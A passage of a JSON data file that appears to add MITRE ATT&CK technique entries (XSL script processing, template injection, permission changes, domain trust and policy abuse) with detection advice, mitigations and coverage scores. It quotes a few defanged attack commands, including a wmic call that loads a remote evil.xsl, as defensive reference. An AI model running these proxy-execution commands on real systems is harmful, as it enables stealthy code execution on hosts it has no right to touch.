MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”", + "url": "https://attack.mitre.org/techniques/T1220", + "tactics": [ + "Defense Evasion" + ], + "detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Module: Module Load", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "cumulative_score": 0.28243618431428574, + "adjusted_score": 0.28243618431428574, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.5,2.7" + ], + "nist_controls": [ + "CM-2", + "CM-6", + "CM-7", + "SI-10", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1221", + "name": "Template Injection", + "description": "Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)", + "url": "https://attack.mitre.org/techniques/T1221", + "tactics": [ + "Defense Evasion" + ], + "detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.4786285714285714, + "adjusted_score": 0.4786285714285714, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.3,2.7,4.1,4.8,13.3,13.8,14.1,14.2,14.6,18.3,18.5" + ], + "nist_controls": [ + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "RA-5", + "SC-44", + "SC-7", + "SI-10", + "SI-2", + "SI-3", + "SI-4", + "SI-7", + "SI-8" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1222", + "name": "File and Directory Permissions Modification", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).", + "url": "https://attack.mitre.org/techniques/T1222", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Active Directory: Active Directory Object Modification", + "Command: Command Execution", + "File: File Metadata", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1222.001", + "name": "File and Directory Permissions Modification: Windows File and Directory Permissions Modification", + "url": "https://attack.mitre.org/techniques/T1222/001", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).", + "detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1222.002", + "name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "url": "https://attack.mitre.org/techniques/T1222/002", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ", + "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ], + "cumulative_score": 0.8422760170038095, + "adjusted_score": 0.8422760170038095, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CM-5", + "CM-6", + "IA-2", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1480", + "name": "Execution Guardrails", + "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", + "url": "https://attack.mitre.org/techniques/T1480", + "tactics": [ + "Defense Evasion" + ], + "detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1480.001", + "name": "Execution Guardrails: Environmental Keying", + "url": "https://attack.mitre.org/techniques/T1480/001", + "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.", + "detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.", + "mitigations": [ + { + "mid": "M1055", + "name": "Do Not Mitigate", + "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.", + "url": "https://attack.mitre.org/mitigations/M1055" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1055", + "name": "Do Not Mitigate", + "description": "This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.", + "url": "https://attack.mitre.org/mitigations/M1055" + } + ], + "cumulative_score": 0.1198, + "adjusted_score": 0.1198, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1482", + "name": "Domain Trust Discovery", + "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)", + "url": "https://attack.mitre.org/techniques/T1482", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)\n", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ], + "cumulative_score": 0.6755899215923808, + "adjusted_score": 0.6755899215923808, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.12,4.1,4.4,11.3,11.4,12.2,12.8,18.3,18.5" + ], + "nist_controls": [ + "AC-4", + "CA-8", + "CM-6", + "CM-7", + "RA-5", + "SA-17", + "SA-8", + "SC-46", + "SC-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1484", + "name": "Domain Policy Modification", + "description": "Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.\n\nWith sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n\nAdversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.", + "url": "https://attack.mitre.org/techniques/T1484", + "tactics": [ + "Defense Evasion", + "Privilege Escalation" + ], + "detection": "It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nConsider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)", + "platforms": [ + "Azure AD", + "Windows" + ], + "data_sources": [ + "Active Directory: Active Directory Object Creation", + "Active Directory: Active Directory Object Deletion", + "Active Directory: Active Directory Object Modification", + "Command: Command Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1484.001", + "name": "Domain Policy Modification: Group Policy Modification", + "url": "https://attack.mitre.org/techniques/T1484/001", + "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)", + "detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1484.002", + "name": "Domain Policy Modification: Domain Trust Modification", + "url": "https://attack.mitre.org/techniques/T1484/002", + "description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.", + "detection": "Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nMonitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\", or Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 1.1267714285714285, + "adjusted_score": 1.1267714285714285, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,4.7,5.3,5.4,5.5,6.1,6.2,6.8,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "RA-5", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1485", + "name": "Data Destruction", + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in 